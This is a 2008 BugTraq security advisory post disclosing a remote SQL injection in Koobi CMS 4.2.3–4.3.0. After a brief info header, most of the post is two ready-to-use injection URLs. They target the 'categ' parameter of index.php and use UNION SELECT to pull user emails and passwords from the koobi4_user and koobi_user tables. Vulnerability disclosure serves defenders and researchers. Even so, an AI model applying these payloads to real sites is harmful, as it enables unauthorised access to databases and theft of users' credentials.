BugTraq
Koobi CMS 4.3.0 - 4.2.3 (categ) Remote SQL Injection Vulnerability Mar 01 2008 11:01AM
sys-project hotmail com
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Koobi CMS 4.3.0 - 4.2.3

[~] HomePage: http://www.dream4.de/

[~] Exploit: Remote SQL Injection [High]

[~] Where: index.php

[~] Bug Found By: Jose Luis Góngora Fernández | JosS

[~] Contact: sys-project[at]hotmail.com

[~] Web: http://www.spanish-hackers.com

[+] Exploit v4.3.0 - v4.2.4:

[~] Table: koobi4_user

[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=[SQL]

[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=-4+union+all+select+1,c
oncat(email,0x203a3a20,pass),3+from+koobi4_user/*

[+] Exploit v4.2.3:

[~] Table: koobi_user

[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=[SQL]

[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=-4+union+all+select+1,c
oncat(email,0x203a3a20,pass),3+from+koobi_user/*

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus